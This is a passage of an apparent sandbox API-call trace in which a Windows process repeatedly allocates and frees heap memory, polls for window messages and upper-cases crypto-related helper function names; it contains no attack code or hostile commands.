wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17682) returned 0xbea018 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.142] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.143] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17682) returned 0xbea018 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0199.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17682) returned 0xa76698 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0199.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.146] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.146] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0199.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.147] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0199.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.147] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0199.148] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.149] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, 